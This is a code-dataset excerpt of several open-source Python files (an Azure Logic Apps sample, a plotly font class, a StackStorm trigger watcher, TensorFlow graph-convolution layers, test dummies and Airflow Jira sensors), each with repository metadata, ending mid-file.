of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Enable the sample Logic App workflow and print the service response."""
    # DefaultAzureCredential picks up the AZURE_* environment variables
    # described in the module docstring.
    credential = DefaultAzureCredential()
    subscription_id = "34adfa4f-cedf-4dc0-ba29-b6d1a69ab345"
    client = LogicManagementClient(credential=credential, subscription_id=subscription_id)

    result = client.workflows.enable(
        resource_group_name="test-resource-group",
        workflow_name="test-workflow",
    )
    print(result)
# x-ms-original-file: specification/logic/resource-manager/Microsoft.Logic/stable/2019-05-01/examples/Workflows_Enable.json
# Allow the sample to be executed directly as a script.
if __name__ == "__main__":
    main()
| {
"content_hash": "ff39919cca2d1d86f7474a3342108aa1",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 123,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.7282003710575139,
"repo_name": "Azure/azure-sdk-for-python",
"id": "cf96b9cc4188ecc9c5498ba8ead4d132c6dcd7c4",
"size": "1546",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/logic/azure-mgmt-logic/generated_samples/enable_a_workflow.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from plotly.basedatatypes import BaseLayoutHierarchyType as _BaseLayoutHierarchyType
import copy as _copy
class Tickfont(_BaseLayoutHierarchyType):
    """Tick label font for layout.scene.zaxis.

    NOTE: this class follows plotly's auto-generated graph-object template;
    edits here are normally overwritten by the code generator.
    """

    # class properties
    # --------------------
    _parent_path_str = "layout.scene.zaxis"
    _path_str = "layout.scene.zaxis.tickfont"
    _valid_props = {"color", "family", "size"}

    # color
    # -----
    @property
    def color(self):
        """
        The 'color' property is a color and may be specified as:
          - A hex string (e.g. '#ff0000')
          - An rgb/rgba string (e.g. 'rgb(255,0,0)')
          - An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
          - An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
          - A named CSS color:
                aliceblue, antiquewhite, aqua, aquamarine, azure,
                beige, bisque, black, blanchedalmond, blue,
                blueviolet, brown, burlywood, cadetblue,
                chartreuse, chocolate, coral, cornflowerblue,
                cornsilk, crimson, cyan, darkblue, darkcyan,
                darkgoldenrod, darkgray, darkgrey, darkgreen,
                darkkhaki, darkmagenta, darkolivegreen, darkorange,
                darkorchid, darkred, darksalmon, darkseagreen,
                darkslateblue, darkslategray, darkslategrey,
                darkturquoise, darkviolet, deeppink, deepskyblue,
                dimgray, dimgrey, dodgerblue, firebrick,
                floralwhite, forestgreen, fuchsia, gainsboro,
                ghostwhite, gold, goldenrod, gray, grey, green,
                greenyellow, honeydew, hotpink, indianred, indigo,
                ivory, khaki, lavender, lavenderblush, lawngreen,
                lemonchiffon, lightblue, lightcoral, lightcyan,
                lightgoldenrodyellow, lightgray, lightgrey,
                lightgreen, lightpink, lightsalmon, lightseagreen,
                lightskyblue, lightslategray, lightslategrey,
                lightsteelblue, lightyellow, lime, limegreen,
                linen, magenta, maroon, mediumaquamarine,
                mediumblue, mediumorchid, mediumpurple,
                mediumseagreen, mediumslateblue, mediumspringgreen,
                mediumturquoise, mediumvioletred, midnightblue,
                mintcream, mistyrose, moccasin, navajowhite, navy,
                oldlace, olive, olivedrab, orange, orangered,
                orchid, palegoldenrod, palegreen, paleturquoise,
                palevioletred, papayawhip, peachpuff, peru, pink,
                plum, powderblue, purple, red, rosybrown,
                royalblue, rebeccapurple, saddlebrown, salmon,
                sandybrown, seagreen, seashell, sienna, silver,
                skyblue, slateblue, slategray, slategrey, snow,
                springgreen, steelblue, tan, teal, thistle, tomato,
                turquoise, violet, wheat, white, whitesmoke,
                yellow, yellowgreen

        Returns
        -------
        str
        """
        return self["color"]

    @color.setter
    def color(self, val):
        self["color"] = val

    # family
    # ------
    @property
    def family(self):
        """
        HTML font family - the typeface that will be applied by the web
        browser. The web browser will only be able to apply a font if
        it is available on the system which it operates. Provide
        multiple font families, separated by commas, to indicate the
        preference in which to apply fonts if they aren't available on
        the system. The Chart Studio Cloud (at https://chart-
        studio.plotly.com or on-premise) generates images on a server,
        where only a select number of fonts are installed and
        supported. These include "Arial", "Balto", "Courier New",
        "Droid Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
        One", "Old Standard TT", "Open Sans", "Overpass", "PT Sans
        Narrow", "Raleway", "Times New Roman".

        The 'family' property is a string and must be specified as:
          - A non-empty string

        Returns
        -------
        str
        """
        return self["family"]

    @family.setter
    def family(self, val):
        self["family"] = val

    # size
    # ----
    @property
    def size(self):
        """
        The 'size' property is a number and may be specified as:
          - An int or float in the interval [1, inf]

        Returns
        -------
        int|float
        """
        return self["size"]

    @size.setter
    def size(self, val):
        self["size"] = val

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        color

        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The Chart
            Studio Cloud (at https://chart-studio.plotly.com or on-
            premise) generates images on a server, where only a
            select number of fonts are installed and supported.
            These include "Arial", "Balto", "Courier New", "Droid
            Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
            One", "Old Standard TT", "Open Sans", "Overpass", "PT
            Sans Narrow", "Raleway", "Times New Roman".
        size

        """

    def __init__(self, arg=None, color=None, family=None, size=None, **kwargs):
        """
        Construct a new Tickfont object

        Sets the tick font.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of
            :class:`plotly.graph_objs.layout.scene.zaxis.Tickfont`
        color

        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The Chart
            Studio Cloud (at https://chart-studio.plotly.com or on-
            premise) generates images on a server, where only a
            select number of fonts are installed and supported.
            These include "Arial", "Balto", "Courier New", "Droid
            Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
            One", "Old Standard TT", "Open Sans", "Overpass", "PT
            Sans Narrow", "Raleway", "Times New Roman".
        size

        Returns
        -------
        Tickfont
        """
        super(Tickfont, self).__init__("tickfont")

        if "_parent" in kwargs:
            self._parent = kwargs["_parent"]
            return

        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.layout.scene.zaxis.Tickfont
constructor must be a dict or
an instance of :class:`plotly.graph_objs.layout.scene.zaxis.Tickfont`"""
            )

        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        self._validate = kwargs.pop("_validate", True)

        # Populate data dict with properties
        # ----------------------------------
        _v = arg.pop("color", None)
        _v = color if color is not None else _v
        if _v is not None:
            self["color"] = _v
        _v = arg.pop("family", None)
        _v = family if family is not None else _v
        if _v is not None:
            self["family"] = _v
        _v = arg.pop("size", None)
        _v = size if size is not None else _v
        if _v is not None:
            self["size"] = _v

        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
| {
"content_hash": "1d043e7722075c095f84129e13d95780",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 84,
"avg_line_length": 37.242290748898675,
"alnum_prop": 0.5596167494677076,
"repo_name": "plotly/plotly.py",
"id": "bd3a918362a2a0e56e4279cf91484c7f53e340d7",
"size": "8454",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/graph_objs/layout/scene/zaxis/_tickfont.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
import eventlet
import uuid
from kombu.mixins import ConsumerMixin
from kombu import Connection
from oslo_config import cfg
from st2common import log as logging
from st2common.persistence.trigger import Trigger
from st2common.transport import reactor, publishers
LOG = logging.getLogger(__name__)
class TriggerWatcher(ConsumerMixin):
    """Consumes trigger create/update/delete (CUD) messages from the message
    bus and dispatches each one to the matching handler callback. Also seeds
    the create handler with triggers already present in the database.
    """

    sleep_interval = 4  # how long to sleep after processing each message

    def __init__(self, create_handler, update_handler, delete_handler,
                 trigger_types=None, queue_suffix=None):
        """
        :param create_handler: Function which is called on TriggerDB create event.
        :type create_handler: ``callable``

        :param update_handler: Function which is called on TriggerDB update event.
        :type update_handler: ``callable``

        :param delete_handler: Function which is called on TriggerDB delete event.
        :type delete_handler: ``callable``

        :param trigger_types: If provided, handler function will only be called
                              if the trigger in the message payload is included
                              in this list.
        :type trigger_types: ``list``
        """
        # TODO: Handle trigger type filtering using routing key
        self._create_handler = create_handler
        self._update_handler = update_handler
        self._delete_handler = delete_handler
        self._trigger_types = trigger_types
        self._trigger_watch_q = self._get_queue(queue_suffix)

        self.connection = None
        self._load_thread = None
        self._updates_thread = None

        # Dispatch table keyed by the AMQP routing key of the CUD event.
        self._handlers = {
            publishers.CREATE_RK: create_handler,
            publishers.UPDATE_RK: update_handler,
            publishers.DELETE_RK: delete_handler
        }

    def get_consumers(self, Consumer, channel):
        return [Consumer(queues=[self._trigger_watch_q],
                         accept=['pickle'],
                         callbacks=[self.process_task])]

    def process_task(self, body, message):
        """Dispatch one CUD message to its handler; the message is always
        acked, even when handling fails, so it is not redelivered."""
        LOG.debug('process_task')
        LOG.debug('     body: %s', body)
        LOG.debug('     message.properties: %s', message.properties)
        LOG.debug('     message.delivery_info: %s', message.delivery_info)

        routing_key = message.delivery_info.get('routing_key', '')
        handler = self._handlers.get(routing_key, None)

        try:
            if not handler:
                LOG.debug('Skipping message %s as no handler was found.', message)
                return

            trigger_type = getattr(body, 'type', None)
            if self._trigger_types and trigger_type not in self._trigger_types:
                LOG.debug('Skipping message %s since trigger_type doesn\'t match (type=%s)',
                          message, trigger_type)
                return

            try:
                handler(body)
            except Exception as e:
                # str(e) rather than e.message: not every exception defines
                # .message, and the attribute does not exist on Python 3.
                LOG.exception('Handling failed. Message body: %s. Exception: %s',
                              body, str(e))
        finally:
            message.ack()

        eventlet.sleep(self.sleep_interval)

    def start(self):
        """Open the bus connection and spawn the consumer and DB-seed threads."""
        try:
            self.connection = Connection(cfg.CONF.messaging.url)
            self._updates_thread = eventlet.spawn(self.run)
            self._load_thread = eventlet.spawn(self._load_triggers_from_db)
        except Exception:
            LOG.exception('Failed to start watcher.')
            # Connection() itself may have thrown, in which case
            # self.connection is still None and there is nothing to release.
            if self.connection:
                self.connection.release()

    def stop(self):
        """Kill worker green threads and release the bus connection."""
        try:
            self._updates_thread = eventlet.kill(self._updates_thread)
            self._load_thread = eventlet.kill(self._load_thread)
        finally:
            # Guard against stop() being called before (or after a failed)
            # start().
            if self.connection:
                self.connection.release()

    # Note: We sleep after we consume a message so we give a chance to other
    # green threads to run. If we don't do that, ConsumerMixin will block on
    # waiting for a message on the queue.
    def on_consume_end(self, connection, channel):
        super(TriggerWatcher, self).on_consume_end(connection=connection,
                                                   channel=channel)
        eventlet.sleep(seconds=self.sleep_interval)

    def on_iteration(self):
        super(TriggerWatcher, self).on_iteration()
        eventlet.sleep(seconds=self.sleep_interval)

    def _load_triggers_from_db(self):
        """Replay pre-existing triggers through the create handler so
        subscribers see state that existed before the watcher started."""
        # trigger_types may legitimately be None (no filtering) -- iterate
        # nothing in that case instead of raising TypeError.
        for trigger_type in (self._trigger_types or []):
            for trigger in Trigger.query(type=trigger_type):
                LOG.debug('Found existing trigger: %s in db.' % trigger)
                self._handlers[publishers.CREATE_RK](trigger)

    @staticmethod
    def _get_queue(queue_suffix):
        if not queue_suffix:
            # pick last 10 digits of uuid. Arbitrary but unique enough for the
            # TriggerWatcher. (Previously a *second* uuid was generated and
            # sliced; slice the one we already have.)
            u_hex = uuid.uuid4().hex
            queue_suffix = u_hex[len(u_hex) - 10:]
        queue_name = 'st2.trigger.watch.%s' % queue_suffix
        return reactor.get_trigger_cud_queue(queue_name, routing_key='#')
| {
"content_hash": "a6624582100d354fc2fa941880152af4",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 95,
"avg_line_length": 38.51162790697674,
"alnum_prop": 0.6048711755233495,
"repo_name": "grengojbo/st2",
"id": "c57d4a79e5866c49b5a40c7601092eb732f26fb1",
"size": "5748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "st2common/st2common/services/triggerwatcher.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "198"
},
{
"name": "Makefile",
"bytes": "21186"
},
{
"name": "PowerShell",
"bytes": "299"
},
{
"name": "Python",
"bytes": "2091976"
},
{
"name": "Shell",
"bytes": "7518"
},
{
"name": "Slash",
"bytes": "677"
}
],
"symlink_target": ""
} |
from .tensorflow_constructions import leaky_relu
import scipy.sparse, networkx, tensorflow as tf, numpy as np, pandas as pd
# TODO(mmd): Use generators properly.
def split_into_components(X_df, G):
    """Split X_df column-wise by the connected components of G.

    set(X_df.columns) must == set(G.nodes). Returns two parallel lists, in
    component order: per-component column subsets of X_df and the matching
    node-induced subgraphs of G.
    """
    X_splits, subgraphs = [], []
    for component in networkx.components.connected_components(G):
        X_splits.append(X_df.filter(items=component))
        subgraphs.append(G.subgraph(component))
    return X_splits, subgraphs
def _pool_step(
    X,
    pool_size,  # TODO(mmd): Better name
    pooler = tf.nn.max_pool,
):
    """Pooling of size p. Should be a power of 2 greater than 1.

    X is expected to be num_samples x num_features x num_filters; the feature
    axis is pooled by `pool_size` -- TODO confirm against callers.
    """
    # BUG FIX: the body previously referenced lowercase `x`, which is
    # undefined here (the parameter is `X`), so every call raised NameError.
    # TODO(mmd): Why all the expansion squeezing necessary?
    x = tf.expand_dims(X, 3)  # num_samples x num_features x num_filters_in x 1
    x = pooler(x, ksize=[1, pool_size, 1, 1], strides=[1, pool_size, 1, 1], padding='SAME')
    #tf.maximum
    return tf.squeeze(x, [3])  # num_samples x num_features / p x num_filters
# TODO(mmd): Unify shape API for graph_conf layers.
# TODO(mmd): Better name.
def _full_fourier_graph_conv_step(
    X,
    G,
    scope,
    nodelist,
    receptive_field_size = 10,
    num_filters_out = 32,
    activation = leaky_relu,
    batch_normalization = None,
    training = True,
    weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
    bias_init = tf.constant_initializer(0.0),
):
    """Graph CNN with full weight matrices, i.e. patch has the same size as input.

    Filters X in the full graph-Fourier basis (eigenvectors of G's
    normalized Laplacian), then applies `activation`. Per the unpacking
    below, X is num_samples x num_features x num_filters_in.

    NOTE(review): receptive_field_size, batch_normalization and training
    are accepted but never used in this body — confirm intent.
    """
    num_samples, num_features, num_filters_in = X.shape.as_list()
    # Graph Fourier basis: eigenvectors of the dense normalized Laplacian.
    L = networkx.normalized_laplacian_matrix(G, nodelist=nodelist)
    U = tf.constant(np.linalg.eigh(L.toarray())[1], dtype=tf.float32)
    # TODO(mmd): Get the below to work.
    #_, U = scipy.sparse.linalg.eigsh(L, k=k, which='SM')
    x = tf.transpose(X, [0, 2, 1]) # num_samples x num_filters_in x num_features
    x = tf.reshape(x, [num_samples * num_filters_in, num_features])
    # Forward graph Fourier transform of every (sample, filter) row.
    xf = tf.expand_dims(tf.matmul(x, U), 1)
    xf = tf.reshape(xf, [num_samples, num_filters_in, num_features])
    xf = tf.transpose(xf, [2, 1, 0]) # num_features x num_filters_in x num_samples
    with tf.variable_scope(scope):
        # TODO(mmd): Shapes probably wrong.
        W = tf.get_variable(
            'graph_convolution',
            [num_features * num_filters_in, num_filters_out, 1],
            tf.float32,
            initializer = weights_init,
        )
        b = tf.get_variable(
            'graph_bias',
            [1, num_filters_out, 1],
            tf.float32,
            initializer = bias_init,
        )
    # Spectral filtering: multiply Fourier coefficients by learned weights.
    yf = tf.matmul(W, xf)
    yf = tf.reshape(tf.transpose(yf, [2, 1, 0]), [num_samples * num_filters_out, num_features])
    # Inverse transform back to the vertex domain (U is orthonormal).
    y = tf.matmul(yf, tf.transpose(U))
    return activation(tf.reshape(y, [num_samples, num_filters_out, num_features]) + b)
# Chebyshev
def _chebyshev_graph_conv_step(
    X,
    G,
    scope,
    nodelist,
    receptive_field_size = 10,
    num_filters_out = 32,
    activation = leaky_relu,
    batch_normalization = None,
    training = True,
    weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
    bias_init = tf.constant_initializer(0.0),
):
    """Graph CNN with full weights, i.e. patch has the same size as input.

    Chebyshev-polynomial approximation of spectral graph convolution:
    builds `receptive_field_size` Chebyshev terms T_k(L - I) applied to X
    and learns one weight per (input filter, polynomial order) pair.

    NOTE(review): batch_normalization and training are accepted but never
    used in this body — confirm intent.
    """
    num_samples, num_features, num_filters_in = X.shape.as_list()
    L = networkx.normalized_laplacian_matrix(G, nodelist=nodelist).astype(np.float32)
    # Shift the Laplacian by -I; this is the operator used in the recursion below.
    L = (L - scipy.sparse.identity(num_features, dtype=L.dtype, format='csr')).tocoo()
    indices = np.column_stack((L.row, L.col))
    L = tf.sparse_reorder(tf.SparseTensor(indices=indices, values=L.data, dense_shape=L.shape))
    # Transform to Chebyshev basis
    # TODO(mmd): Are the permutations/reshapes really necessary or would this just work with smart
    # broadcasting?
    x0 = tf.transpose(X, perm=[1, 2, 0]) # num_features x num_filters_in x num_samples
    x0 = tf.reshape(x0, [num_features, num_filters_in*num_samples])
    chebyshev_terms = [x0]
    if receptive_field_size > 1:
        # T_1 = L x0
        chebyshev_terms.append(tf.sparse_tensor_dense_matmul(L, chebyshev_terms[-1]))
    # Chebyshev recursion: T_k = 2 L T_{k-1} - T_{k-2}
    for _ in range(2, receptive_field_size):
        chebyshev_terms += [2*tf.sparse_tensor_dense_matmul(L, chebyshev_terms[-1]) - chebyshev_terms[-2]]
    x = tf.stack(chebyshev_terms) # receptive_field_size x num_features x num_filters_in*num_samples
    x = tf.reshape(x, [receptive_field_size, num_features, num_filters_in, num_samples])
    x = tf.transpose(x, perm=[3,1,2,0]) # num_samples x num_features x num_filters_in x receptive_field_size
    # TODO(mmd): Do I need to reshape like this or can this be handled fine with tensor multiplications?
    x = tf.reshape(x, [num_samples * num_features, num_filters_in * receptive_field_size])
    with tf.variable_scope(scope):
        # Filter: num_filters_in -> num_filters_out filters of order K, i.e. one filterbank per feature pair.
        W = tf.get_variable(
            'graph_convolution',
            [num_filters_in * receptive_field_size, num_filters_out],
            tf.float32,
            initializer = weights_init
        )
        b = tf.get_variable(
            'bias',
            [1, 1, num_filters_out],
            tf.float32,
            initializer = bias_init
        )
        x = activation(tf.matmul(x, W) + b)
    return tf.reshape(x, [num_samples, num_features, num_filters_out])
# TODO(mmd): Make accept num_filters_out (right now is effectively (though not in impl.) hard-coded @ 1)
def _graph_localized_ff_step(
    X,
    G,
    scope,
    nodelist,
    activation = leaky_relu,
    batch_normalization = None,
    training = True,
    weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
    bias_init = tf.constant_initializer(0.0),
):
    """Feed-forward layer masked by the graph: node i only mixes inputs
    from itself and its neighbors in G (one learned weight per nonzero of
    A + I, plus a per-node bias).

    Per the unpacking below, X is num_samples x num_features.
    NOTE(review): batch_normalization, training, and num_samples are
    accepted/computed but never used in this body — confirm intent.
    """
    num_samples, num_features = X.shape.as_list()
    A = networkx.adjacency_matrix(G, nodelist=nodelist).astype(np.float32)
    # Add self-loops so each node also sees its own input.
    A = (A + scipy.sparse.identity(num_features, dtype=A.dtype, format='csr')).tocoo()
    indices = np.column_stack((A.row, A.col))
    num_edges = len(indices)
    with tf.variable_scope(scope):
        # One free parameter per nonzero of A + I; scattered into a sparse matrix.
        W = tf.get_variable(
            'graph_localized_ff_weights',
            [num_edges],
            tf.float32,
            initializer = weights_init,
        )
        W_tensor = tf.sparse_reorder(
            tf.SparseTensor(indices=indices, values=W, dense_shape=[num_features, num_features])
        )
        b = tf.get_variable(
            'bias',
            [num_features],
            tf.float32,
            initializer = bias_init,
        )
    # Sparse matmul works feature-major, hence the transposes around it.
    return activation(tf.transpose(tf.sparse_tensor_dense_matmul(W_tensor, tf.transpose(X))) + b)
| {
"content_hash": "e91ac38d1cb7f90f36f7fee4fa956d30",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 110,
"avg_line_length": 39.401162790697676,
"alnum_prop": 0.6175298804780877,
"repo_name": "mmcdermott/ml_toolkit",
"id": "8626e98cb92b8bc7d9556d24dbc5111ff058558b",
"size": "6827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ml_toolkit/graph_layers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34746"
}
],
"symlink_target": ""
} |
"""Generates a saved model with tf.Pow to trigger placer and grappler."""
import shutil
from absl import app
from absl import flags
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils
flags.DEFINE_string('saved_model_path', '', 'Path to save the model to.')
FLAGS = flags.FLAGS
def main(argv):
    """Build and export a SavedModel with two signatures: one over a
    read-only reference variable and one over a plain placeholder.

    Raises app.UsageError if extra command-line arguments are passed.
    """
    if len(argv) > 1:
        raise app.UsageError('Too many command-line arguments.')

    # Start from a clean export directory. ignore_errors prevents a crash on
    # the first run, when the directory does not exist yet.
    shutil.rmtree(FLAGS.saved_model_path, ignore_errors=True)

    # Create the graph
    # 'x' is a read-only Reference Variable in this test case, which will be
    # converted to Resource Variable in the MLIR lowering pass.
    x = variable_scope.get_variable(name='x', initializer=[[1], [2], [3]])
    r = math_ops.add(x, 1)

    x1 = array_ops.placeholder(dtype=dtypes.int32, shape=(1, 3), name='input1')
    r1 = math_ops.add(x1, 1)

    # Use the session as a context manager so it is closed after export
    # (the original leaked it).
    with session.Session() as sess:
        sess.run(variables.global_variables_initializer())

        sm_builder = builder.SavedModelBuilder(FLAGS.saved_model_path)
        tensor_info_x = utils.build_tensor_info(x)
        tensor_info_r = utils.build_tensor_info(r)
        tensor_info_x1 = utils.build_tensor_info(x1)
        tensor_info_r1 = utils.build_tensor_info(r1)

        # Signature exercising the reference-variable path.
        ref_signature = (
            signature_def_utils.build_signature_def(
                inputs={'x': tensor_info_x},
                outputs={'r': tensor_info_r},
                method_name=signature_constants.PREDICT_METHOD_NAME))
        # Signature exercising the plain placeholder path.
        non_ref_signature = (
            signature_def_utils.build_signature_def(
                inputs={'x1': tensor_info_x1},
                outputs={'r1': tensor_info_r1},
                method_name=signature_constants.PREDICT_METHOD_NAME))

        sm_builder.add_meta_graph_and_variables(
            sess, [tag_constants.SERVING],
            signature_def_map={
                'ref': ref_signature,
                'non_ref': non_ref_signature,
            },
            strip_default_attrs=True)
        sm_builder.save()
if __name__ == '__main__':
    # absl handles flag parsing before invoking main.
    app.run(main)
| {
"content_hash": "2a6034a4478469f795706bf32defe2a7",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 77,
"avg_line_length": 32.361111111111114,
"alnum_prop": 0.7072961373390558,
"repo_name": "tensorflow/tensorflow-pywrap_tf_optimizer",
"id": "8825353cba9539db0b62d3a8961dc25fe47f1a98",
"size": "3019",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "tensorflow/core/tfrt/saved_model/tests/gen_ref_type_tensor_input.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1360509"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "124617937"
},
{
"name": "CMake",
"bytes": "183407"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416070"
},
{
"name": "Go",
"bytes": "2104698"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074471"
},
{
"name": "Jupyter Notebook",
"bytes": "789401"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11175525"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "169288"
},
{
"name": "Objective-C++",
"bytes": "294187"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42599764"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "619753"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14607"
},
{
"name": "Starlark",
"bytes": "7521293"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
import numpy as np
from .interfaces.dataset import Dataset
from .interfaces.model import Model
from .interfaces.loss import Loss
from .interfaces.optimizer import Optimizer
from .interfaces.batch_scheduler import BatchScheduler
class DummyDataset(Dataset):
    """Dataset stub backed by an empty numpy array, for tests."""

    def __init__(self):
        super(DummyDataset, self).__init__(np.array([]))
class DummyModel(Model):
    """Model stub: no parameters, no updates, identity output, no-op I/O."""

    def __init__(self):
        super(DummyModel, self).__init__()
        self._parameters = []

    @property
    def parameters(self):
        # No trainable parameters.
        return self._parameters

    @property
    def updates(self):
        return dict()

    def get_output(self, inputs):
        # Identity model: echo the inputs back unchanged.
        return inputs

    def save(self, path):
        pass  # Nothing to persist.

    def load(self, path):
        pass  # Nothing to restore.
class DummyLoss(Loss):
    """Loss stub over a DummyModel/DummyDataset pair; the model output
    itself serves as the loss."""

    def __init__(self):
        super(DummyLoss, self).__init__(DummyModel(), DummyDataset())

    def _compute_loss(self, model_output):
        return model_output

    def _get_updates(self):
        return dict()
class DummyOptimizer(Optimizer):
    """Optimizer stub with no updates and no directions."""

    def __init__(self):
        super(DummyOptimizer, self).__init__(loss=DummyLoss())

    def _get_updates(self):
        return dict()

    def _get_directions(self):
        return dict()
class DummyBatchScheduler(BatchScheduler):
    """Batch scheduler stub that yields a single batch index (0)."""

    def __init__(self):
        super(DummyBatchScheduler, self).__init__(DummyDataset())

    @property
    def givens(self):
        return dict()

    @property
    def updates(self):
        return dict()

    def __iter__(self):
        # Exactly one batch per epoch.
        return iter([0])
| {
"content_hash": "75a0d3272a35eff2197ec677ed9c6238",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 69,
"avg_line_length": 20.397260273972602,
"alnum_prop": 0.6165211551376762,
"repo_name": "havaeimo/smartlearner",
"id": "5edf1cec1875d5e1a1ea63c6f653830b0c541a67",
"size": "1489",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smartlearner/testing.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "53080"
}
],
"symlink_target": ""
} |
from typing import Any, Callable, Dict, Optional
from jira.resources import Issue, Resource
from airflow.providers.jira.operators.jira import JIRAError, JiraOperator
from airflow.sensors.base import BaseSensorOperator
class JiraSensor(BaseSensorOperator):
    """
    Monitors a jira ticket for any change.

    :param jira_conn_id: reference to a pre-defined Jira Connection
    :type jira_conn_id: str
    :param method_name: method name from jira-python-sdk to be execute
    :type method_name: str
    :param method_params: parameters for the method method_name
    :type method_params: dict
    :param result_processor: function that return boolean and act as a sensor response
    :type result_processor: function
    """

    def __init__(
        self,
        *,
        method_name: str,
        jira_conn_id: str = 'jira_default',
        method_params: Optional[dict] = None,
        result_processor: Optional[Callable] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.jira_conn_id = jira_conn_id
        # Stays None unless a callable was supplied.
        self.result_processor = result_processor
        self.method_name = method_name
        self.method_params = method_params
        # Delegate the actual Jira call to an identically-configured operator.
        self.jira_operator = JiraOperator(
            task_id=self.task_id,
            jira_conn_id=self.jira_conn_id,
            jira_method=self.method_name,
            jira_method_args=self.method_params,
            result_processor=self.result_processor,
        )

    def poke(self, context: Dict) -> Any:
        """Execute the wrapped operator; its result drives the sensor."""
        return self.jira_operator.execute(context=context)
class JiraTicketSensor(JiraSensor):
    """
    Monitors a jira ticket for given change in terms of function.

    :param jira_conn_id: reference to a pre-defined Jira Connection
    :type jira_conn_id: str
    :param ticket_id: id of the ticket to be monitored
    :type ticket_id: str
    :param field: field of the ticket to be monitored
    :type field: str
    :param expected_value: expected value of the field
    :type expected_value: str
    :param result_processor: function that return boolean and act as a sensor response
    :type result_processor: function
    """

    template_fields = ("ticket_id",)

    def __init__(
        self,
        *,
        jira_conn_id: str = 'jira_default',
        ticket_id: Optional[str] = None,
        field: Optional[str] = None,
        expected_value: Optional[str] = None,
